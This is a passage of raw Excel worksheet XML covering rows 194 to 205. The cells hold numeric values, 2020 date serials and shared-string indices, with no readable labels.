      <c r="AW194">
        <v>20</v>
      </c>
      <c r="AX194">
        <v>15</v>
      </c>
      <c r="AY194">
        <v>3</v>
      </c>
      <c r="AZ194">
        <v>3</v>
      </c>
      <c r="BA194" t="s">
        <v>17419</v>
      </c>
      <c r="BB194" t="s">
        <v>14874</v>
      </c>
      <c r="BC194" t="s">
        <v>9693</v>
      </c>
      <c r="BD194" t="s">
        <v>10328</v>
      </c>
    </row>
    <row r="195" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A195">
        <v>606</v>
      </c>
      <c r="B195" t="s">
        <v>1693</v>
      </c>
      <c r="C195" t="s">
        <v>129</v>
      </c>
      <c r="D195" t="s">
        <v>1694</v>
      </c>
      <c r="E195" t="s">
        <v>142</v>
      </c>
      <c r="F195" t="s">
        <v>1695</v>
      </c>
      <c r="G195" s="1">
        <v>44071</v>
      </c>
      <c r="H195">
        <v>4887</v>
      </c>
      <c r="I195">
        <v>4887</v>
      </c>
      <c r="J195">
        <v>1</v>
      </c>
      <c r="K195">
        <v>1</v>
      </c>
      <c r="L195">
        <v>0</v>
      </c>
      <c r="M195">
        <v>0</v>
      </c>
      <c r="N195">
        <v>0</v>
      </c>
      <c r="O195">
        <v>0</v>
      </c>
      <c r="P195">
        <v>0</v>
      </c>
      <c r="Q195">
        <v>0</v>
      </c>
      <c r="R195">
        <v>0</v>
      </c>
      <c r="S195">
        <v>1</v>
      </c>
      <c r="T195">
        <v>0</v>
      </c>
      <c r="U195">
        <v>500</v>
      </c>
      <c r="V195">
        <v>1</v>
      </c>
      <c r="W195">
        <v>0</v>
      </c>
      <c r="X195">
        <v>0</v>
      </c>
      <c r="Y195">
        <v>0</v>
      </c>
      <c r="Z195">
        <v>0</v>
      </c>
      <c r="AA195">
        <v>0</v>
      </c>
      <c r="AB195">
        <v>0</v>
      </c>
      <c r="AC195">
        <v>0</v>
      </c>
      <c r="AD195">
        <v>1</v>
      </c>
      <c r="AE195">
        <v>0</v>
      </c>
      <c r="AF195" t="s">
        <v>1696</v>
      </c>
      <c r="AG195">
        <v>15211</v>
      </c>
      <c r="AH195">
        <v>11</v>
      </c>
      <c r="AJ195">
        <v>268</v>
      </c>
      <c r="AK195" t="s">
        <v>252</v>
      </c>
      <c r="AL195" t="s">
        <v>253</v>
      </c>
      <c r="AM195" t="s">
        <v>1697</v>
      </c>
      <c r="AN195" t="s">
        <v>68</v>
      </c>
      <c r="AO195">
        <v>2009</v>
      </c>
      <c r="AP195">
        <v>2122432160</v>
      </c>
      <c r="AQ195" t="s">
        <v>1698</v>
      </c>
      <c r="AR195" t="s">
        <v>1696</v>
      </c>
      <c r="AS195" t="s">
        <v>179</v>
      </c>
      <c r="AT195" t="s">
        <v>72</v>
      </c>
      <c r="AU195">
        <v>6</v>
      </c>
      <c r="AV195">
        <v>1</v>
      </c>
      <c r="AW195">
        <v>12</v>
      </c>
      <c r="AX195">
        <v>6</v>
      </c>
      <c r="AY195">
        <v>10</v>
      </c>
      <c r="AZ195">
        <v>5</v>
      </c>
      <c r="BA195" t="s">
        <v>17442</v>
      </c>
      <c r="BB195" t="s">
        <v>14713</v>
      </c>
      <c r="BC195" t="s">
        <v>11446</v>
      </c>
      <c r="BD195">
        <v>0</v>
      </c>
    </row>
    <row r="196" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A196">
        <v>295</v>
      </c>
      <c r="B196" t="s">
        <v>1699</v>
      </c>
      <c r="C196" t="s">
        <v>99</v>
      </c>
      <c r="D196" t="s">
        <v>1700</v>
      </c>
      <c r="E196" t="s">
        <v>142</v>
      </c>
      <c r="F196" t="s">
        <v>1701</v>
      </c>
      <c r="G196" s="1">
        <v>44106</v>
      </c>
      <c r="H196">
        <v>4931</v>
      </c>
      <c r="I196">
        <v>4931</v>
      </c>
      <c r="J196">
        <v>3</v>
      </c>
      <c r="K196">
        <v>0</v>
      </c>
      <c r="L196">
        <v>1</v>
      </c>
      <c r="M196">
        <v>1</v>
      </c>
      <c r="N196">
        <v>0</v>
      </c>
      <c r="O196">
        <v>0</v>
      </c>
      <c r="P196">
        <v>0</v>
      </c>
      <c r="Q196">
        <v>2</v>
      </c>
      <c r="R196">
        <v>4</v>
      </c>
      <c r="S196">
        <v>0</v>
      </c>
      <c r="T196">
        <v>1</v>
      </c>
      <c r="U196">
        <v>600000</v>
      </c>
      <c r="V196">
        <v>0</v>
      </c>
      <c r="W196">
        <v>3000</v>
      </c>
      <c r="X196">
        <v>2000</v>
      </c>
      <c r="Y196">
        <v>0</v>
      </c>
      <c r="Z196">
        <v>0</v>
      </c>
      <c r="AA196">
        <v>0</v>
      </c>
      <c r="AB196">
        <v>200</v>
      </c>
      <c r="AC196">
        <v>200</v>
      </c>
      <c r="AD196">
        <v>0</v>
      </c>
      <c r="AE196">
        <v>10000</v>
      </c>
      <c r="AF196" t="s">
        <v>1702</v>
      </c>
      <c r="AG196">
        <v>14440</v>
      </c>
      <c r="AH196">
        <v>12</v>
      </c>
      <c r="AJ196">
        <v>160</v>
      </c>
      <c r="AK196" t="s">
        <v>114</v>
      </c>
      <c r="AL196" t="s">
        <v>114</v>
      </c>
      <c r="AM196" t="s">
        <v>1703</v>
      </c>
      <c r="AN196" t="s">
        <v>82</v>
      </c>
      <c r="AO196">
        <v>2014</v>
      </c>
      <c r="AP196" t="s">
        <v>1704</v>
      </c>
      <c r="AQ196" t="s">
        <v>1705</v>
      </c>
      <c r="AR196" t="s">
        <v>1366</v>
      </c>
      <c r="AS196" t="s">
        <v>371</v>
      </c>
      <c r="AT196" t="s">
        <v>72</v>
      </c>
      <c r="AU196">
        <v>25</v>
      </c>
      <c r="AV196">
        <v>1</v>
      </c>
      <c r="AW196">
        <v>0</v>
      </c>
      <c r="AX196">
        <v>0</v>
      </c>
      <c r="AY196">
        <v>68</v>
      </c>
      <c r="AZ196">
        <v>23</v>
      </c>
      <c r="BA196" t="s">
        <v>16659</v>
      </c>
      <c r="BB196" t="s">
        <v>14462</v>
      </c>
      <c r="BC196" t="s">
        <v>9550</v>
      </c>
      <c r="BD196" t="s">
        <v>11471</v>
      </c>
    </row>
    <row r="197" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A197">
        <v>679</v>
      </c>
      <c r="B197" t="s">
        <v>1706</v>
      </c>
      <c r="C197" t="s">
        <v>318</v>
      </c>
      <c r="D197" t="s">
        <v>1707</v>
      </c>
      <c r="E197" t="s">
        <v>363</v>
      </c>
      <c r="F197" t="s">
        <v>1708</v>
      </c>
      <c r="G197" s="1">
        <v>44116</v>
      </c>
      <c r="H197">
        <v>4955</v>
      </c>
      <c r="I197">
        <v>4955</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1</v>
      </c>
      <c r="AE197">
        <v>1000</v>
      </c>
      <c r="AF197" t="s">
        <v>1709</v>
      </c>
      <c r="AG197">
        <v>90241</v>
      </c>
      <c r="AH197">
        <v>26</v>
      </c>
      <c r="AJ197">
        <v>420</v>
      </c>
      <c r="AK197" t="s">
        <v>936</v>
      </c>
      <c r="AL197" t="s">
        <v>1710</v>
      </c>
      <c r="AM197" t="s">
        <v>1711</v>
      </c>
      <c r="AN197" t="s">
        <v>68</v>
      </c>
      <c r="AO197">
        <v>2003</v>
      </c>
      <c r="AP197" t="s">
        <v>1712</v>
      </c>
      <c r="AQ197" t="s">
        <v>1713</v>
      </c>
      <c r="AR197" t="s">
        <v>1709</v>
      </c>
      <c r="AS197" t="s">
        <v>71</v>
      </c>
      <c r="AT197" t="s">
        <v>72</v>
      </c>
      <c r="AU197">
        <v>26</v>
      </c>
      <c r="AV197">
        <v>1</v>
      </c>
      <c r="AW197">
        <v>0</v>
      </c>
      <c r="AX197">
        <v>0</v>
      </c>
      <c r="AY197">
        <v>6</v>
      </c>
      <c r="AZ197">
        <v>5</v>
      </c>
      <c r="BA197" t="s">
        <v>17456</v>
      </c>
      <c r="BB197" t="s">
        <v>14770</v>
      </c>
      <c r="BC197">
        <v>0</v>
      </c>
      <c r="BD197" t="s">
        <v>10763</v>
      </c>
    </row>
    <row r="198" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A198">
        <v>292</v>
      </c>
      <c r="B198" t="s">
        <v>1714</v>
      </c>
      <c r="C198" t="s">
        <v>99</v>
      </c>
      <c r="D198" t="s">
        <v>1715</v>
      </c>
      <c r="E198" t="s">
        <v>142</v>
      </c>
      <c r="F198" t="s">
        <v>1716</v>
      </c>
      <c r="G198" s="1">
        <v>44117</v>
      </c>
      <c r="H198">
        <v>4972</v>
      </c>
      <c r="I198">
        <v>4972</v>
      </c>
      <c r="J198">
        <v>1</v>
      </c>
      <c r="K198">
        <v>0</v>
      </c>
      <c r="L198">
        <v>1</v>
      </c>
      <c r="M198">
        <v>0</v>
      </c>
      <c r="N198">
        <v>0</v>
      </c>
      <c r="O198">
        <v>0</v>
      </c>
      <c r="P198">
        <v>0</v>
      </c>
      <c r="Q198">
        <v>0</v>
      </c>
      <c r="R198">
        <v>0</v>
      </c>
      <c r="S198">
        <v>0</v>
      </c>
      <c r="T198">
        <v>0</v>
      </c>
      <c r="U198">
        <v>800000</v>
      </c>
      <c r="V198">
        <v>0</v>
      </c>
      <c r="W198">
        <v>400000</v>
      </c>
      <c r="X198">
        <v>0</v>
      </c>
      <c r="Y198">
        <v>0</v>
      </c>
      <c r="Z198">
        <v>0</v>
      </c>
      <c r="AA198">
        <v>0</v>
      </c>
      <c r="AB198">
        <v>0</v>
      </c>
      <c r="AC198">
        <v>0</v>
      </c>
      <c r="AD198">
        <v>0</v>
      </c>
      <c r="AE198">
        <v>0</v>
      </c>
      <c r="AF198" t="s">
        <v>1077</v>
      </c>
      <c r="AG198">
        <v>14440</v>
      </c>
      <c r="AH198">
        <v>12</v>
      </c>
      <c r="AJ198">
        <v>160</v>
      </c>
      <c r="AK198" t="s">
        <v>114</v>
      </c>
      <c r="AL198" t="s">
        <v>114</v>
      </c>
      <c r="AM198" t="s">
        <v>1717</v>
      </c>
      <c r="AN198" t="s">
        <v>55</v>
      </c>
      <c r="AO198">
        <v>2017</v>
      </c>
      <c r="AP198">
        <v>66696790</v>
      </c>
      <c r="AQ198" t="s">
        <v>1718</v>
      </c>
      <c r="AR198" t="s">
        <v>1077</v>
      </c>
      <c r="AS198" t="s">
        <v>187</v>
      </c>
      <c r="AT198" t="s">
        <v>58</v>
      </c>
      <c r="AU198">
        <v>7</v>
      </c>
      <c r="AV198">
        <v>1</v>
      </c>
      <c r="AW198">
        <v>5</v>
      </c>
      <c r="AX198">
        <v>0</v>
      </c>
      <c r="AY198">
        <v>7</v>
      </c>
      <c r="AZ198">
        <v>2</v>
      </c>
      <c r="BA198" t="s">
        <v>17512</v>
      </c>
      <c r="BB198" t="s">
        <v>14460</v>
      </c>
      <c r="BC198" t="s">
        <v>11900</v>
      </c>
      <c r="BD198">
        <v>0</v>
      </c>
    </row>
    <row r="199" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A199">
        <v>618</v>
      </c>
      <c r="B199" t="s">
        <v>1719</v>
      </c>
      <c r="C199" t="s">
        <v>168</v>
      </c>
      <c r="D199" t="s">
        <v>1720</v>
      </c>
      <c r="E199" t="s">
        <v>142</v>
      </c>
      <c r="F199" t="s">
        <v>1721</v>
      </c>
      <c r="G199" s="1">
        <v>44091</v>
      </c>
      <c r="H199">
        <v>4978</v>
      </c>
      <c r="I199">
        <v>4978</v>
      </c>
      <c r="J199">
        <v>6</v>
      </c>
      <c r="K199">
        <v>0</v>
      </c>
      <c r="L199">
        <v>2</v>
      </c>
      <c r="M199">
        <v>2</v>
      </c>
      <c r="N199">
        <v>0</v>
      </c>
      <c r="O199">
        <v>0</v>
      </c>
      <c r="P199">
        <v>0</v>
      </c>
      <c r="Q199">
        <v>0</v>
      </c>
      <c r="R199">
        <v>0</v>
      </c>
      <c r="S199">
        <v>0</v>
      </c>
      <c r="T199">
        <v>0</v>
      </c>
      <c r="U199">
        <v>2450000</v>
      </c>
      <c r="V199">
        <v>0</v>
      </c>
      <c r="W199">
        <v>8000</v>
      </c>
      <c r="X199">
        <v>3360</v>
      </c>
      <c r="Y199">
        <v>0</v>
      </c>
      <c r="Z199">
        <v>0</v>
      </c>
      <c r="AA199">
        <v>0</v>
      </c>
      <c r="AB199">
        <v>0</v>
      </c>
      <c r="AC199">
        <v>0</v>
      </c>
      <c r="AD199">
        <v>0</v>
      </c>
      <c r="AE199">
        <v>0</v>
      </c>
      <c r="AF199" t="s">
        <v>1722</v>
      </c>
      <c r="AG199">
        <v>45173</v>
      </c>
      <c r="AH199">
        <v>13</v>
      </c>
      <c r="AJ199">
        <v>169</v>
      </c>
      <c r="AK199" t="s">
        <v>1723</v>
      </c>
      <c r="AL199" t="s">
        <v>1724</v>
      </c>
      <c r="AM199" t="s">
        <v>1725</v>
      </c>
      <c r="AN199" t="s">
        <v>82</v>
      </c>
      <c r="AO199">
        <v>2012</v>
      </c>
      <c r="AP199" t="s">
        <v>1726</v>
      </c>
      <c r="AQ199" t="s">
        <v>1727</v>
      </c>
      <c r="AR199" t="s">
        <v>1722</v>
      </c>
      <c r="AS199" t="s">
        <v>71</v>
      </c>
      <c r="AT199" t="s">
        <v>86</v>
      </c>
      <c r="AU199">
        <v>26</v>
      </c>
      <c r="AV199">
        <v>2</v>
      </c>
      <c r="AW199">
        <v>129</v>
      </c>
      <c r="AX199">
        <v>896</v>
      </c>
      <c r="AY199">
        <v>41</v>
      </c>
      <c r="AZ199">
        <v>21</v>
      </c>
      <c r="BA199" t="s">
        <v>16866</v>
      </c>
      <c r="BB199" t="s">
        <v>14723</v>
      </c>
      <c r="BC199" t="s">
        <v>11525</v>
      </c>
      <c r="BD199" t="s">
        <v>11526</v>
      </c>
    </row>
    <row r="200" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A200">
        <v>548</v>
      </c>
      <c r="B200" t="s">
        <v>1728</v>
      </c>
      <c r="C200" t="s">
        <v>99</v>
      </c>
      <c r="D200" t="s">
        <v>1729</v>
      </c>
      <c r="E200" t="s">
        <v>142</v>
      </c>
      <c r="F200" t="s">
        <v>1730</v>
      </c>
      <c r="G200" s="1">
        <v>44095</v>
      </c>
      <c r="H200">
        <v>5011</v>
      </c>
      <c r="I200">
        <v>5011</v>
      </c>
      <c r="J200">
        <v>1</v>
      </c>
      <c r="K200">
        <v>0</v>
      </c>
      <c r="L200">
        <v>0</v>
      </c>
      <c r="M200">
        <v>0</v>
      </c>
      <c r="N200">
        <v>0</v>
      </c>
      <c r="O200">
        <v>0</v>
      </c>
      <c r="P200">
        <v>0</v>
      </c>
      <c r="Q200">
        <v>0</v>
      </c>
      <c r="R200">
        <v>1</v>
      </c>
      <c r="S200">
        <v>0</v>
      </c>
      <c r="T200">
        <v>0</v>
      </c>
      <c r="U200">
        <v>900</v>
      </c>
      <c r="V200">
        <v>0</v>
      </c>
      <c r="W200">
        <v>0</v>
      </c>
      <c r="X200">
        <v>0</v>
      </c>
      <c r="Y200">
        <v>0</v>
      </c>
      <c r="Z200">
        <v>0</v>
      </c>
      <c r="AA200">
        <v>0</v>
      </c>
      <c r="AB200">
        <v>0</v>
      </c>
      <c r="AC200">
        <v>200</v>
      </c>
      <c r="AD200">
        <v>0</v>
      </c>
      <c r="AE200">
        <v>0</v>
      </c>
      <c r="AF200" t="s">
        <v>1731</v>
      </c>
      <c r="AG200">
        <v>14440</v>
      </c>
      <c r="AH200">
        <v>12</v>
      </c>
      <c r="AJ200">
        <v>160</v>
      </c>
      <c r="AK200" t="s">
        <v>114</v>
      </c>
      <c r="AL200" t="s">
        <v>114</v>
      </c>
      <c r="AM200" t="s">
        <v>1732</v>
      </c>
      <c r="AN200" t="s">
        <v>82</v>
      </c>
      <c r="AO200">
        <v>2005</v>
      </c>
      <c r="AP200" t="s">
        <v>1733</v>
      </c>
      <c r="AQ200" t="s">
        <v>1734</v>
      </c>
      <c r="AR200" t="s">
        <v>1735</v>
      </c>
      <c r="AS200" t="s">
        <v>71</v>
      </c>
      <c r="AT200" t="s">
        <v>86</v>
      </c>
      <c r="AU200">
        <v>26</v>
      </c>
      <c r="AV200">
        <v>1</v>
      </c>
      <c r="AW200">
        <v>0</v>
      </c>
      <c r="AX200">
        <v>0</v>
      </c>
      <c r="AY200">
        <v>17</v>
      </c>
      <c r="AZ200">
        <v>7</v>
      </c>
      <c r="BA200" t="s">
        <v>16716</v>
      </c>
      <c r="BB200" t="s">
        <v>14664</v>
      </c>
      <c r="BC200" t="s">
        <v>11505</v>
      </c>
      <c r="BD200" t="s">
        <v>11506</v>
      </c>
    </row>
    <row r="201" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A201">
        <v>710</v>
      </c>
      <c r="B201" t="s">
        <v>1736</v>
      </c>
      <c r="C201" t="s">
        <v>579</v>
      </c>
      <c r="D201" t="s">
        <v>1737</v>
      </c>
      <c r="E201" t="s">
        <v>49</v>
      </c>
      <c r="F201" t="s">
        <v>1738</v>
      </c>
      <c r="G201" s="1">
        <v>44055</v>
      </c>
      <c r="H201">
        <v>5031</v>
      </c>
      <c r="I201">
        <v>5031</v>
      </c>
      <c r="J201">
        <v>0</v>
      </c>
      <c r="K201">
        <v>2</v>
      </c>
      <c r="L201">
        <v>0</v>
      </c>
      <c r="M201">
        <v>0</v>
      </c>
      <c r="N201">
        <v>0</v>
      </c>
      <c r="O201">
        <v>0</v>
      </c>
      <c r="P201">
        <v>0</v>
      </c>
      <c r="Q201">
        <v>1</v>
      </c>
      <c r="R201">
        <v>1</v>
      </c>
      <c r="S201">
        <v>0</v>
      </c>
      <c r="T201">
        <v>1</v>
      </c>
      <c r="U201">
        <v>0</v>
      </c>
      <c r="V201">
        <v>1200</v>
      </c>
      <c r="W201">
        <v>0</v>
      </c>
      <c r="X201">
        <v>0</v>
      </c>
      <c r="Y201">
        <v>0</v>
      </c>
      <c r="Z201">
        <v>0</v>
      </c>
      <c r="AA201">
        <v>0</v>
      </c>
      <c r="AB201">
        <v>300</v>
      </c>
      <c r="AC201">
        <v>300</v>
      </c>
      <c r="AD201">
        <v>0</v>
      </c>
      <c r="AE201">
        <v>100</v>
      </c>
      <c r="AF201" t="s">
        <v>1739</v>
      </c>
      <c r="AG201">
        <v>75312</v>
      </c>
      <c r="AH201">
        <v>23</v>
      </c>
      <c r="AJ201">
        <v>365</v>
      </c>
      <c r="AK201" t="s">
        <v>1740</v>
      </c>
      <c r="AL201" t="s">
        <v>1741</v>
      </c>
      <c r="AM201" t="s">
        <v>1742</v>
      </c>
      <c r="AN201" t="s">
        <v>68</v>
      </c>
      <c r="AO201">
        <v>2012</v>
      </c>
      <c r="AP201">
        <v>81350244938</v>
      </c>
      <c r="AQ201" t="s">
        <v>1743</v>
      </c>
      <c r="AR201" t="s">
        <v>1739</v>
      </c>
      <c r="AS201" t="s">
        <v>71</v>
      </c>
      <c r="AT201" t="s">
        <v>72</v>
      </c>
      <c r="AU201">
        <v>48</v>
      </c>
      <c r="AV201">
        <v>1</v>
      </c>
      <c r="AW201">
        <v>0</v>
      </c>
      <c r="AX201">
        <v>0</v>
      </c>
      <c r="AY201">
        <v>2</v>
      </c>
      <c r="AZ201">
        <v>2</v>
      </c>
      <c r="BA201" t="s">
        <v>16743</v>
      </c>
      <c r="BB201" t="s">
        <v>14793</v>
      </c>
      <c r="BC201" t="s">
        <v>11488</v>
      </c>
      <c r="BD201">
        <v>0</v>
      </c>
    </row>
    <row r="202" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A202">
        <v>565</v>
      </c>
      <c r="B202" t="s">
        <v>1744</v>
      </c>
      <c r="C202" t="s">
        <v>607</v>
      </c>
      <c r="D202" t="s">
        <v>1745</v>
      </c>
      <c r="E202" t="s">
        <v>142</v>
      </c>
      <c r="F202" t="s">
        <v>1746</v>
      </c>
      <c r="G202" s="1">
        <v>44117</v>
      </c>
      <c r="H202">
        <v>5075</v>
      </c>
      <c r="I202">
        <v>5075</v>
      </c>
      <c r="J202">
        <v>1</v>
      </c>
      <c r="K202">
        <v>0</v>
      </c>
      <c r="L202">
        <v>0</v>
      </c>
      <c r="M202">
        <v>4</v>
      </c>
      <c r="N202">
        <v>0</v>
      </c>
      <c r="O202">
        <v>0</v>
      </c>
      <c r="P202">
        <v>0</v>
      </c>
      <c r="Q202">
        <v>3</v>
      </c>
      <c r="R202">
        <v>30</v>
      </c>
      <c r="S202">
        <v>0</v>
      </c>
      <c r="T202">
        <v>0</v>
      </c>
      <c r="U202">
        <v>40000</v>
      </c>
      <c r="V202">
        <v>0</v>
      </c>
      <c r="W202">
        <v>0</v>
      </c>
      <c r="X202">
        <v>600</v>
      </c>
      <c r="Y202">
        <v>0</v>
      </c>
      <c r="Z202">
        <v>0</v>
      </c>
      <c r="AA202">
        <v>0</v>
      </c>
      <c r="AB202">
        <v>5</v>
      </c>
      <c r="AC202">
        <v>300</v>
      </c>
      <c r="AD202">
        <v>0</v>
      </c>
      <c r="AE202">
        <v>0</v>
      </c>
      <c r="AF202" t="s">
        <v>1747</v>
      </c>
      <c r="AG202">
        <v>77146</v>
      </c>
      <c r="AH202">
        <v>24</v>
      </c>
      <c r="AJ202">
        <v>370</v>
      </c>
      <c r="AK202" t="s">
        <v>611</v>
      </c>
      <c r="AL202" t="s">
        <v>612</v>
      </c>
      <c r="AM202" t="s">
        <v>1748</v>
      </c>
      <c r="AN202" t="s">
        <v>55</v>
      </c>
      <c r="AO202">
        <v>2012</v>
      </c>
      <c r="AP202" t="s">
        <v>1749</v>
      </c>
      <c r="AQ202" t="s">
        <v>1750</v>
      </c>
      <c r="AR202" t="s">
        <v>1751</v>
      </c>
      <c r="AU202">
        <v>26</v>
      </c>
      <c r="AV202">
        <v>1</v>
      </c>
      <c r="AW202">
        <v>44</v>
      </c>
      <c r="AX202">
        <v>41</v>
      </c>
      <c r="AY202">
        <v>5</v>
      </c>
      <c r="AZ202">
        <v>0</v>
      </c>
      <c r="BA202" t="s">
        <v>17449</v>
      </c>
      <c r="BB202" t="s">
        <v>14678</v>
      </c>
      <c r="BC202">
        <v>0</v>
      </c>
      <c r="BD202" t="s">
        <v>11513</v>
      </c>
    </row>
    <row r="203" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A203">
        <v>276</v>
      </c>
      <c r="B203" t="s">
        <v>1752</v>
      </c>
      <c r="C203" t="s">
        <v>157</v>
      </c>
      <c r="D203" t="s">
        <v>1753</v>
      </c>
      <c r="E203" t="s">
        <v>809</v>
      </c>
      <c r="F203" t="s">
        <v>1754</v>
      </c>
      <c r="G203" s="1">
        <v>44118</v>
      </c>
      <c r="H203">
        <v>5089</v>
      </c>
      <c r="I203">
        <v>5089</v>
      </c>
      <c r="J203">
        <v>8</v>
      </c>
      <c r="K203">
        <v>2</v>
      </c>
      <c r="L203">
        <v>2</v>
      </c>
      <c r="M203">
        <v>0</v>
      </c>
      <c r="N203">
        <v>0</v>
      </c>
      <c r="O203">
        <v>0</v>
      </c>
      <c r="P203">
        <v>0</v>
      </c>
      <c r="Q203">
        <v>2</v>
      </c>
      <c r="R203">
        <v>10</v>
      </c>
      <c r="S203">
        <v>1</v>
      </c>
      <c r="T203">
        <v>1</v>
      </c>
      <c r="U203">
        <v>200000</v>
      </c>
      <c r="V203">
        <v>2</v>
      </c>
      <c r="W203">
        <v>3000</v>
      </c>
      <c r="X203">
        <v>0</v>
      </c>
      <c r="Y203">
        <v>0</v>
      </c>
      <c r="Z203">
        <v>0</v>
      </c>
      <c r="AA203">
        <v>0</v>
      </c>
      <c r="AB203">
        <v>200</v>
      </c>
      <c r="AC203">
        <v>2000</v>
      </c>
      <c r="AD203">
        <v>1</v>
      </c>
      <c r="AE203">
        <v>30000</v>
      </c>
      <c r="AF203" t="s">
        <v>1755</v>
      </c>
      <c r="AG203">
        <v>67152</v>
      </c>
      <c r="AH203">
        <v>16</v>
      </c>
      <c r="AJ203">
        <v>241</v>
      </c>
      <c r="AK203" t="s">
        <v>1117</v>
      </c>
      <c r="AL203" t="s">
        <v>1118</v>
      </c>
      <c r="AM203" t="s">
        <v>1756</v>
      </c>
      <c r="AN203" t="s">
        <v>55</v>
      </c>
      <c r="AO203">
        <v>1996</v>
      </c>
      <c r="AP203" t="s">
        <v>1757</v>
      </c>
      <c r="AQ203" t="s">
        <v>1758</v>
      </c>
      <c r="AR203" t="s">
        <v>1759</v>
      </c>
      <c r="AS203" t="s">
        <v>71</v>
      </c>
      <c r="AT203" t="s">
        <v>58</v>
      </c>
      <c r="AU203">
        <v>22</v>
      </c>
      <c r="AV203">
        <v>1</v>
      </c>
      <c r="AW203">
        <v>0</v>
      </c>
      <c r="AX203">
        <v>1</v>
      </c>
      <c r="AY203">
        <v>36</v>
      </c>
      <c r="AZ203">
        <v>31</v>
      </c>
      <c r="BA203" t="s">
        <v>16654</v>
      </c>
      <c r="BB203" t="s">
        <v>14445</v>
      </c>
      <c r="BC203">
        <v>0</v>
      </c>
      <c r="BD203" t="s">
        <v>10774</v>
      </c>
    </row>
    <row r="204" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A204">
        <v>575</v>
      </c>
      <c r="B204" t="s">
        <v>1760</v>
      </c>
      <c r="C204" t="s">
        <v>607</v>
      </c>
      <c r="D204" t="s">
        <v>1761</v>
      </c>
      <c r="E204" t="s">
        <v>142</v>
      </c>
      <c r="F204" t="s">
        <v>1762</v>
      </c>
      <c r="G204" s="1">
        <v>44085</v>
      </c>
      <c r="H204">
        <v>5133</v>
      </c>
      <c r="I204">
        <v>5133</v>
      </c>
      <c r="J204">
        <v>3</v>
      </c>
      <c r="K204">
        <v>1</v>
      </c>
      <c r="L204">
        <v>0</v>
      </c>
      <c r="M204">
        <v>5</v>
      </c>
      <c r="N204">
        <v>600</v>
      </c>
      <c r="O204">
        <v>0</v>
      </c>
      <c r="P204">
        <v>0</v>
      </c>
      <c r="Q204">
        <v>1</v>
      </c>
      <c r="R204">
        <v>30</v>
      </c>
      <c r="S204">
        <v>0</v>
      </c>
      <c r="T204">
        <v>1</v>
      </c>
      <c r="U204">
        <v>450000</v>
      </c>
      <c r="V204">
        <v>500</v>
      </c>
      <c r="W204">
        <v>0</v>
      </c>
      <c r="X204">
        <v>1500</v>
      </c>
      <c r="Y204">
        <v>0</v>
      </c>
      <c r="Z204">
        <v>0</v>
      </c>
      <c r="AA204">
        <v>0</v>
      </c>
      <c r="AB204">
        <v>1000</v>
      </c>
      <c r="AC204">
        <v>15000</v>
      </c>
      <c r="AD204">
        <v>0</v>
      </c>
      <c r="AE204">
        <v>100000</v>
      </c>
      <c r="AF204" t="s">
        <v>1763</v>
      </c>
      <c r="AG204">
        <v>77121</v>
      </c>
      <c r="AH204">
        <v>24</v>
      </c>
      <c r="AJ204">
        <v>370</v>
      </c>
      <c r="AK204" t="s">
        <v>611</v>
      </c>
      <c r="AL204" t="s">
        <v>612</v>
      </c>
      <c r="AM204" t="s">
        <v>1764</v>
      </c>
      <c r="AN204" t="s">
        <v>82</v>
      </c>
      <c r="AO204">
        <v>2003</v>
      </c>
      <c r="AP204" t="s">
        <v>1765</v>
      </c>
      <c r="AQ204" t="s">
        <v>1766</v>
      </c>
      <c r="AR204" t="s">
        <v>1767</v>
      </c>
      <c r="AS204" t="s">
        <v>71</v>
      </c>
      <c r="AT204" t="s">
        <v>86</v>
      </c>
      <c r="AU204">
        <v>20</v>
      </c>
      <c r="AV204">
        <v>1</v>
      </c>
      <c r="AW204">
        <v>102</v>
      </c>
      <c r="AX204">
        <v>50</v>
      </c>
      <c r="AY204">
        <v>65</v>
      </c>
      <c r="AZ204">
        <v>151</v>
      </c>
      <c r="BA204" t="s">
        <v>17445</v>
      </c>
      <c r="BB204" t="s">
        <v>14687</v>
      </c>
      <c r="BC204">
        <v>0</v>
      </c>
      <c r="BD204" t="s">
        <v>11513</v>
      </c>
    </row>
    <row r="205" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A205">
        <v>460</v>
      </c>
      <c r="B205" t="s">
        <v>1768</v>
      </c>
      <c r="C205" t="s">
        <v>477</v>
      </c>
      <c r="D205" t="s">
        <v>1769</v>
      </c>
      <c r="E205" t="s">
        <v>142</v>
      </c>
      <c r="F205" t="s">
        <v>666</v>
      </c>
      <c r="G205" s="1">
        <v>44048</v>
      </c>
      <c r="H205">
        <v>5172</v>
      </c>
      <c r="I205">
        <v>5172</v>
      </c>
      <c r="J205">
        <v>2</v>
      </c>
      <c r="K205">
        <v>0</v>
      </c>
      <c r="L205">
        <v>10</v>
      </c>
      <c r="M205">
        <v>0</v>
      </c>
      <c r="N205">
        <v>0</v>
      </c>
      <c r="O205">
        <v>0</v>
      </c>
      <c r="P205">
        <v>0</v>
      </c>
      <c r="Q205">
        <v>0</v>
      </c>
      <c r="R205">
        <v>0</v>
      </c>
      <c r="S205">
        <v>0</v>
      </c>
      <c r="T205">
        <v>1</v>
      </c>
      <c r="U205">
        <v>500000</v>
      </c>
      <c r="V205">
        <v>0</v>
      </c>
      <c r="W205">
        <v>40000</v>
      </c>
      <c r="X205">
        <v>0</v>
      </c>
      <c r="Y205">
        <v>0</v>
      </c>
      <c r="Z205">
        <v>0</v>
      </c>
      <c r="AA205">
        <v>0</v>
      </c>
      <c r="AB205">
        <v>0</v>
      </c>
      <c r="AC205">
        <v>0</v>
      </c>
      <c r="AD205">
        <v>0</v>
      </c>
      <c r="AE205">
        <v>200000</v>
      </c>
      <c r="AF205" t="s">
        <v>1770</v>
      </c>
      <c r="AG205">
        <v>95545</v>
      </c>
      <c r="AH205">
        <v>29</v>
      </c>
      <c r="AJ205">
        <v>383</v>
      </c>
      <c r="AK205" t="s">
        <v>1330</v>
      </c>
      <c r="AL205" t="s">
        <v>1771</v>
      </c>
      <c r="AM205" t="s">
        <v>1772</v>
      </c>
      <c r="AN205" t="s">
        <v>82</v>
      </c>
      <c r="AO205">
